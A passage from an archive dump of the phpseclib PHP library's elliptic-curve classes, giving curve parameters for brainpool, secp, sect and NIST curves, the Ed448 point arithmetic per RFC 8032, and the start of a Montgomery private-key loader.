'640ECE5C12788717B9C1BA06CBC2A6FEBA85842458C56DDE9DB1758D39C0313D82BA51735CD' . 'B3EA499AA77A7D6943A64F7A3F25FE26F06B51BAA2696FA9035DA', 16 ), new BigInteger( '5B534BD595F5AF0FA2C892376C84ACE1BB4E3019B71634C01131159CAE03CEE9D9932184BEE' . 'F216BD71DF2DADF86A627306ECFF96DBB8BACE198B61E00F8B332', 16 ) ); $this->setOrder(new BigInteger( 'AADD9DB8DBE9C48B3FD4E6AE33C9FC07CB308DB3B3C9D20ED6639CCA70330870553E5C414CA' . '92619418661197FAC10471DB1D381085DDADDB58796829CA90069', 16 )); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP192r1.php000064400000002107147600400120024125 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class brainpoolP192r1 extends Prime { public function __construct() { $this->setModulo(new BigInteger('C302F41D932A36CDA7A3463093D18DB78FCE476DE1A86297', 16)); $this->setCoefficients( new BigInteger('6A91174076B1E0E19C39C031FE8685C1CAE040E5C69A28EF', 16), new BigInteger('469A28EF7C28CCA3DC721D044F4496BCCA7EF4146FBF25C9', 16) ); $this->setBasePoint( new BigInteger('C0A0647EAAB6A48753B033C56CB0F0900A2F5C4853375FD6', 16), new BigInteger('14B690866ABD5BB88B5F4828C1490002E6773FA2FA299B8F', 16) ); $this->setOrder(new BigInteger('C302F41D932A36CDA7A3462F9E9E916B5BE8F1029AC4ACC1', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp160r2.php000064400000002052147600400120022745 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class secp160r2 extends Prime { public function __construct() { // same as secp160k1 $this->setModulo(new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFAC73', 16)); $this->setCoefficients( new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFAC70', 16), new BigInteger('B4E134D3FB59EB8BAB57274904664D5AF50388BA', 16) ); $this->setBasePoint( new BigInteger('52DCB034293A117E1F4FF11B30F7199D3144CE6D', 16), new BigInteger('FEAFFEF2E331F296E071FA0DF9982CFEA7D43F2E', 16) ); $this->setOrder(new BigInteger('0100000000000000000000351EE786A818F3A1A16B', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect113r1.php000064400000001526147600400120022753 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Binary; use phpseclib3\Math\BigInteger; class sect113r1 extends Binary { public function __construct() { $this->setModulo(113, 9, 0); $this->setCoefficients( '003088250CA6E7C7FE649CE85820F7', '00E8BEE4D3E2260744188BE0E9C723' ); $this->setBasePoint( '009D73616F35F4AB1407D73562C10F', '00A52830277958EE84D1315ED31886' ); $this->setOrder(new BigInteger('0100000000000000D9CCEC8A39E56F', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/Ed448.php000064400000017250147600400120022116 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards; use phpseclib3\Crypt\Hash; use phpseclib3\Crypt\Random; use phpseclib3\Math\BigInteger; class Ed448 extends TwistedEdwards { const HASH = 'shake256-912'; const SIZE = 57; public function __construct() { // 2^448 - 2^224 - 1 $this->setModulo(new BigInteger( 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE' . 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF', 16 )); $this->setCoefficients( new BigInteger(1), // -39081 new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE' . 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF6756', 16) ); $this->setBasePoint( new BigInteger('4F1970C66BED0DED221D15A622BF36DA9E146570470F1767EA6DE324' . 'A3D3A46412AE1AF72AB66511433B80E18B00938E2626A82BC70CC05E', 16), new BigInteger('693F46716EB6BC248876203756C9C7624BEA73736CA3984087789C1E' . '05A0C2D73AD3FF1CE67C39C4FDBD132C4ED7C8AD9808795BF230FA14', 16) ); $this->setOrder(new BigInteger( '3FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF' . '7CCA23E9C44EDB49AED63690216CC2728DC58F552378C292AB5844F3', 16 )); } /** * Recover X from Y * * Implements steps 2-4 at https://tools.ietf.org/html/rfc8032#section-5.2.3 * * Used by EC\Keys\Common.php * * @param BigInteger $y * @param boolean $sign * @return object[] */ public function recoverX(BigInteger $y, $sign) { $y = $this->factory->newInteger($y); $y2 = $y->multiply($y); $u = $y2->subtract($this->one); $v = $this->d->multiply($y2)->subtract($this->one); $x2 = $u->divide($v); if ($x2->equals($this->zero)) { if ($sign) { throw new \RuntimeException('Unable to recover X coordinate (x2 = 0)'); } return clone $this->zero; } // find the square root $exp = $this->getModulo()->add(new BigInteger(1)); $exp = $exp->bitwise_rightShift(2); $x = $x2->pow($exp); if (!$x->multiply($x)->subtract($x2)->equals($this->zero)) { throw new \RuntimeException('Unable to recover X coordinate'); } if ($x->isOdd() != $sign) { $x = $x->negate(); } return [$x, $y]; } /** * Extract Secret Scalar * * Implements steps 1-3 at https://tools.ietf.org/html/rfc8032#section-5.2.5 * * Used by the various key handlers * * @param string $str * @return array */ public function extractSecret($str) { if (strlen($str) != 57) { throw new \LengthException('Private Key should be 57-bytes long'); } // 1. Hash the 57-byte private key using SHAKE256(x, 114), storing the // digest in a 114-octet large buffer, denoted h. Only the lower 57 // bytes are used for generating the public key. $hash = new Hash('shake256-912'); $h = $hash->hash($str); $h = substr($h, 0, 57); // 2. Prune the buffer: The two least significant bits of the first // octet are cleared, all eight bits the last octet are cleared, and // the highest bit of the second to last octet is set. $h[0] = $h[0] & chr(0xFC); $h = strrev($h); $h[0] = "\0"; $h[1] = $h[1] | chr(0x80); // 3. Interpret the buffer as the little-endian integer, forming a // secret scalar s. $dA = new BigInteger($h, 256); return [ 'dA' => $dA, 'secret' => $str ]; $dA->secret = $str; return $dA; } /** * Encode a point as a string * * @param array $point * @return string */ public function encodePoint($point) { list($x, $y) = $point; $y = "\0" . $y->toBytes(); if ($x->isOdd()) { $y[0] = $y[0] | chr(0x80); } $y = strrev($y); return $y; } /** * Creates a random scalar multiplier * * @return \phpseclib3\Math\PrimeField\Integer */ public function createRandomMultiplier() { return $this->extractSecret(Random::string(57))['dA']; } /** * Converts an affine point to an extended homogeneous coordinate * * From https://tools.ietf.org/html/rfc8032#section-5.2.4 : * * A point (x,y) is represented in extended homogeneous coordinates (X, Y, Z, T), * with x = X/Z, y = Y/Z, x * y = T/Z. * * @return \phpseclib3\Math\PrimeField\Integer[] */ public function convertToInternal(array $p) { if (empty($p)) { return [clone $this->zero, clone $this->one, clone $this->one]; } if (isset($p[2])) { return $p; } $p[2] = clone $this->one; return $p; } /** * Doubles a point on a curve * * @return FiniteField[] */ public function doublePoint(array $p) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } if (!count($p)) { return []; } if (!isset($p[2])) { throw new \RuntimeException('Affine coordinates need to be manually converted to "Jacobi" coordinates or vice versa'); } // from https://tools.ietf.org/html/rfc8032#page-18 list($x1, $y1, $z1) = $p; $b = $x1->add($y1); $b = $b->multiply($b); $c = $x1->multiply($x1); $d = $y1->multiply($y1); $e = $c->add($d); $h = $z1->multiply($z1); $j = $e->subtract($this->two->multiply($h)); $x3 = $b->subtract($e)->multiply($j); $y3 = $c->subtract($d)->multiply($e); $z3 = $e->multiply($j); return [$x3, $y3, $z3]; } /** * Adds two points on the curve * * @return FiniteField[] */ public function addPoint(array $p, array $q) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } if (!count($p) || !count($q)) { if (count($q)) { return $q; } if (count($p)) { return $p; } return []; } if (!isset($p[2]) || !isset($q[2])) { throw new \RuntimeException('Affine coordinates need to be manually converted to "Jacobi" coordinates or vice versa'); } if ($p[0]->equals($q[0])) { return !$p[1]->equals($q[1]) ? [] : $this->doublePoint($p); } // from https://tools.ietf.org/html/rfc8032#page-17 list($x1, $y1, $z1) = $p; list($x2, $y2, $z2) = $q; $a = $z1->multiply($z2); $b = $a->multiply($a); $c = $x1->multiply($x2); $d = $y1->multiply($y2); $e = $this->d->multiply($c)->multiply($d); $f = $b->subtract($e); $g = $b->add($e); $h = $x1->add($y1)->multiply($x2->add($y2)); $x3 = $a->multiply($f)->multiply($h->subtract($c)->subtract($d)); $y3 = $a->multiply($g)->multiply($d->subtract($c)); $z3 = $f->multiply($g); return [$x3, $y3, $z3]; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp128r1.php000064400000001733147600400120022755 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class secp128r1 extends Prime { public function __construct() { $this->setModulo(new BigInteger('FFFFFFFDFFFFFFFFFFFFFFFFFFFFFFFF', 16)); $this->setCoefficients( new BigInteger('FFFFFFFDFFFFFFFFFFFFFFFFFFFFFFFC', 16), new BigInteger('E87579C11079F43DD824993C2CEE5ED3', 16) ); $this->setBasePoint( new BigInteger('161FF7528B899B2D0C28607CA52C5B86', 16), new BigInteger('CF5AC8395BAFEB13C02DA292DDED7A83', 16) ); $this->setOrder(new BigInteger('FFFFFFFE0000000075A30D1B9038A115', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect571r1.php000064400000003020147600400120022752 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Binary; use phpseclib3\Math\BigInteger; class sect571r1 extends Binary { public function __construct() { $this->setModulo(571, 10, 5, 2, 0); $this->setCoefficients( '000000000000000000000000000000000000000000000000000000000000000000000000' . '000000000000000000000000000000000000000000000000000000000000000000000001', '02F40E7E2221F295DE297117B7F3D62F5C6A97FFCB8CEFF1CD6BA8CE4A9A18AD84FFABBD' . '8EFA59332BE7AD6756A66E294AFD185A78FF12AA520E4DE739BACA0C7FFEFF7F2955727A' ); $this->setBasePoint( '0303001D34B856296C16C0D40D3CD7750A93D1D2955FA80AA5F40FC8DB7B2ABDBDE53950' . 'F4C0D293CDD711A35B67FB1499AE60038614F1394ABFA3B4C850D927E1E7769C8EEC2D19', '037BF27342DA639B6DCCFFFEB73D69D78C6C27A6009CBBCA1980F8533921E8A684423E43' . 'BAB08A576291AF8F461BB2A8B3531D2F0485C19B16E2F1516E23DD3C1A4827AF1B8AC15B' ); $this->setOrder(new BigInteger( '03FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF' . 'E661CE18FF55987308059B186823851EC7DD9CA1161DE93D5174D66E8382E9BB2FE84E47', 16 )); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect233r1.php000064400000001755147600400120022762 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Binary; use phpseclib3\Math\BigInteger; class sect233r1 extends Binary { public function __construct() { $this->setModulo(233, 74, 0); $this->setCoefficients( '000000000000000000000000000000000000000000000000000000000001', '0066647EDE6C332C7F8C0923BB58213B333B20E9CE4281FE115F7D8F90AD' ); $this->setBasePoint( '00FAC9DFCBAC8313BB2139F1BB755FEF65BC391F8B36F8F8EB7371FD558B', '01006A08A41903350678E58528BEBF8A0BEFF867A7CA36716F7E01F81052' ); $this->setOrder(new BigInteger('01000000000000000000000000000013E974E72F8A6922031D2603CFE0D7', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP192t1.php000064400000002121147600400120024123 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class brainpoolP192t1 extends Prime { public function __construct() { $this->setModulo(new BigInteger('C302F41D932A36CDA7A3463093D18DB78FCE476DE1A86297', 16)); $this->setCoefficients( new BigInteger('C302F41D932A36CDA7A3463093D18DB78FCE476DE1A86294', 16), // eg. -3 new BigInteger('13D56FFAEC78681E68F9DEB43B35BEC2FB68542E27897B79', 16) ); $this->setBasePoint( new BigInteger('3AE9E58C82F63C30282E1FE7BBF43FA72C446AF6F4618129', 16), new BigInteger('097E2C5667C2223A902AB5CA449D0084B7E5B3DE7CCC01C9', 16) ); $this->setOrder(new BigInteger('C302F41D932A36CDA7A3462F9E9E916B5BE8F1029AC4ACC1', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp112r1.php000064400000001703147600400120022743 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class secp112r1 extends Prime { public function __construct() { $this->setModulo(new BigInteger('DB7C2ABF62E35E668076BEAD208B', 16)); $this->setCoefficients( new BigInteger('DB7C2ABF62E35E668076BEAD2088', 16), new BigInteger('659EF8BA043916EEDE8911702B22', 16) ); $this->setBasePoint( new BigInteger('09487239995A5EE76B55F9C2F098', 16), new BigInteger('A89CE5AF8724C0A23E0E0FF77500', 16) ); $this->setOrder(new BigInteger('DB7C2ABF62E35E7628DFAC6561C5', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect163r1.php000064400000001630147600400120022754 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Binary; use phpseclib3\Math\BigInteger; class sect163r1 extends Binary { public function __construct() { $this->setModulo(163, 7, 6, 3, 0); $this->setCoefficients( '07B6882CAAEFA84F9554FF8428BD88E246D2782AE2', '0713612DCDDCB40AAB946BDA29CA91F73AF958AFD9' ); $this->setBasePoint( '0369979697AB43897789566789567F787A7876A654', '00435EDB42EFAFB2989D51FEFCE3C80988F41FF883' ); $this->setOrder(new BigInteger('03FFFFFFFFFFFFFFFFFFFF48AAB689C29CA710279B', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/prime256v1.php000064400000000552147600400120023143 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; final class prime256v1 extends secp256r1 { } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp256r1.php000064400000002233147600400120022753 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class secp256r1 extends Prime { public function __construct() { $this->setModulo(new BigInteger('FFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF', 16)); $this->setCoefficients( new BigInteger('FFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFC', 16), new BigInteger('5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B', 16) ); $this->setBasePoint( new BigInteger('6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296', 16), new BigInteger('4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5', 16) ); $this->setOrder(new BigInteger('FFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect113r2.php000064400000001526147600400120022754 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Binary; use phpseclib3\Math\BigInteger; class sect113r2 extends Binary { public function __construct() { $this->setModulo(113, 9, 0); $this->setCoefficients( '00689918DBEC7E5A0DD6DFC0AA55C7', '0095E9A9EC9B297BD4BF36E059184F' ); $this->setBasePoint( '01A57A6A7B26CA5EF52FCDB8164797', '00B3ADC94ED1FE674C06E695BABA1D' ); $this->setOrder(new BigInteger('010000000000000108789B2496AF93', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect131r1.php000064400000001560147600400120022751 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Binary; use phpseclib3\Math\BigInteger; class sect131r1 extends Binary { public function __construct() { $this->setModulo(131, 8, 3, 2, 0); $this->setCoefficients( '07A11B09A76B562144418FF3FF8C2570B8', '0217C05610884B63B9C6C7291678F9D341' ); $this->setBasePoint( '0081BAF91FDF9833C40F9C181343638399', '078C6E7EA38C001F73C8134B1B4EF9E150' ); $this->setOrder(new BigInteger('0400000000000000023123953A9464B54D', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistt571.php000064400000000546147600400120022724 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; final class nistt571 extends sect571k1 { } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect193r2.php000064400000001673147600400120022767 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Binary; use phpseclib3\Math\BigInteger; class sect193r2 extends Binary { public function __construct() { $this->setModulo(193, 15, 0); $this->setCoefficients( '0163F35A5137C2CE3EA6ED8667190B0BC43ECD69977702709B', '00C9BB9E8927D4D64C377E2AB2856A5B16E3EFB7F61D4316AE' ); $this->setBasePoint( '00D9B67D192E0367C803F39E1A7E82CA14A651350AAE617E8F', '01CE94335607C304AC29E7DEFBD9CA01F596F927224CDECF6C' ); $this->setOrder(new BigInteger('010000000000000000000000015AAB561B005413CCD4EE99D5', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistb233.php000064400000000546147600400120022675 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; final class nistb233 extends sect233r1 { } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect571k1.php000064400000003020147600400120022743 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Binary; use phpseclib3\Math\BigInteger; class sect571k1 extends Binary { public function __construct() { $this->setModulo(571, 10, 5, 2, 0); $this->setCoefficients( '000000000000000000000000000000000000000000000000000000000000000000000000' . '000000000000000000000000000000000000000000000000000000000000000000000000', '000000000000000000000000000000000000000000000000000000000000000000000000' . '000000000000000000000000000000000000000000000000000000000000000000000001' ); $this->setBasePoint( '026EB7A859923FBC82189631F8103FE4AC9CA2970012D5D46024804801841CA443709584' . '93B205E647DA304DB4CEB08CBBD1BA39494776FB988B47174DCA88C7E2945283A01C8972', '0349DC807F4FBF374F4AEADE3BCA95314DD58CEC9F307A54FFC61EFC006D8A2C9D4979C0' . 'AC44AEA74FBEBBB9F772AEDCB620B01A7BA7AF1B320430C8591984F601CD4C143EF1C7A3' ); $this->setOrder(new BigInteger( '020000000000000000000000000000000000000000000000000000000000000000000000' . '131850E1F19A63E4B391A8DB917F4138B630D84BE5D639381E91DEB45CFE778F637C1001', 16 )); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp192r1.php000064400000005732147600400120022761 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class secp192r1 extends Prime { public function __construct() { $modulo = new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFF', 16); $this->setModulo($modulo); // algorithm 2.27 from http://diamond.boisestate.edu/~liljanab/MATH308/GuideToECC.pdf#page=66 /* in theory this should be faster than regular modular reductions save for one small issue. to convert to / from base-2**8 with BCMath you have to call bcmul() and bcdiv() a lot. to convert to / from base-2**8 with PHP64 you have to call base256_rshift() a lot. in short, converting to / from base-2**8 is pretty expensive and that expense is enough to offset whatever else might be gained by a simplified reduction algorithm. now, if PHP supported unsigned integers things might be different. no bit-shifting would be required for the PHP engine and it'd be a lot faster. but as is, BigInteger uses base-2**31 or base-2**26 depending on whether or not the system is has a 32-bit or a 64-bit OS. */ /* $m_length = $this->getLengthInBytes(); $this->setReduction(function($c) use ($m_length) { $cBytes = $c->toBytes(); $className = $this->className; if (strlen($cBytes) > 2 * $m_length) { list(, $r) = $c->divide($className::$modulo); return $r; } $c = str_pad($cBytes, 48, "\0", STR_PAD_LEFT); $c = array_reverse(str_split($c, 8)); $null = "\0\0\0\0\0\0\0\0"; $s1 = new BigInteger($c[2] . $c[1] . $c[0], 256); $s2 = new BigInteger($null . $c[3] . $c[3], 256); $s3 = new BigInteger($c[4] . $c[4] . $null, 256); $s4 = new BigInteger($c[5] . $c[5] . $c[5], 256); $r = $s1->add($s2)->add($s3)->add($s4); while ($r->compare($className::$modulo) >= 0) { $r = $r->subtract($className::$modulo); } return $r; }); */ $this->setCoefficients( new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFC', 16), new BigInteger('64210519E59C80E70FA7E9AB72243049FEB8DEECC146B9B1', 16) ); $this->setBasePoint( new BigInteger('188DA80EB03090F67CBF20EB43A18800F4FF0AFD82FF1012', 16), new BigInteger('07192B95FFC8DA78631011ED6B24CDD573F977A11E794811', 16) ); $this->setOrder(new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFF99DEF836146BC9B1B4D22831', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistp192.php000064400000000546147600400120022717 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; final class nistp192 extends secp192r1 { } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp224r1.php000064400000002153147600400120022747 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class secp224r1 extends Prime { public function __construct() { $this->setModulo(new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000001', 16)); $this->setCoefficients( new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFE', 16), new BigInteger('B4050A850C04B3ABF54132565044B0B7D7BFD8BA270B39432355FFB4', 16) ); $this->setBasePoint( new BigInteger('B70E0CBD6BB4BF7F321390B94A03C1D356C21122343280D6115C1D21', 16), new BigInteger('BD376388B5F723FB4C22DFE6CD4375A05A07476444D5819985007E34', 16) ); $this->setOrder(new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFF16A2E0B8F03E13DD29455C5C2A3D', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistk233.php000064400000000546147600400120022706 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; final class nistk233 extends sect233k1 { } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP256r1.php000064400000002247147600400120024133 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class brainpoolP256r1 extends Prime { public function __construct() { $this->setModulo(new BigInteger('A9FB57DBA1EEA9BC3E660A909D838D726E3BF623D52620282013481D1F6E5377', 16)); $this->setCoefficients( new BigInteger('7D5A0975FC2C3057EEF67530417AFFE7FB8055C126DC5C6CE94A4B44F330B5D9', 16), new BigInteger('26DC5C6CE94A4B44F330B5D9BBD77CBF958416295CF7E1CE6BCCDC18FF8C07B6', 16) ); $this->setBasePoint( new BigInteger('8BD2AEB9CB7E57CB2C4B482FFC81B7AFB9DE27E1E3BD23C23A4453BD9ACE3262', 16), new BigInteger('547EF835C3DAC4FD97F8461A14611DC9C27745132DED8E545C1D54C72F046997', 16) ); $this->setOrder(new BigInteger('A9FB57DBA1EEA9BC3E660A909D838D718C397AA3B561A6F7901E0E82974856A7', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect283r1.php000064400000002061147600400120022756 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Binary; use phpseclib3\Math\BigInteger; class sect283r1 extends Binary { public function __construct() { $this->setModulo(283, 12, 7, 5, 0); $this->setCoefficients( '000000000000000000000000000000000000000000000000000000000000000000000001', '027B680AC8B8596DA5A4AF8A19A0303FCA97FD7645309FA2A581485AF6263E313B79A2F5' ); $this->setBasePoint( '05F939258DB7DD90E1934F8C70B0DFEC2EED25B8557EAC9C80E2E198F8CDBECD86B12053', '03676854FE24141CB98FE6D4B20D02B4516FF702350EDDB0826779C813F0DF45BE8112F4' ); $this->setOrder(new BigInteger('03FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEF90399660FC938A90165B042A7CEFADB307', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistp256.php000064400000000546147600400120022720 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; final class nistp256 extends secp256r1 { } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Keys/MontgomeryPrivate.php000064400000006404147600400120026077 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\EC\Formats\Keys; use phpseclib3\Crypt\EC\BaseCurves\Montgomery as MontgomeryCurve; use phpseclib3\Crypt\EC\Curves\Curve25519; use phpseclib3\Crypt\EC\Curves\Curve448; use phpseclib3\Exception\UnsupportedFormatException; use phpseclib3\Math\BigInteger; /** * Montgomery Curve Private Key Handler * * @author Jim Wigginton */ abstract class MontgomeryPrivate { /** * Is invisible flag * */ const IS_INVISIBLE = true; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { switch (strlen($key)) { case 32: $curve = new Curve25519(); break; case 56: $curve = new Curve448(); break; default: throw new \LengthException('The only supported lengths are 32 and 56'); } $components = ['curve' => $curve]; $components['dA'] = new BigInteger($key, 256); $curve->rangeCheck($components['dA']); // note that EC::getEncodedCoordinates does some additional "magic" (it does strrev on the result) 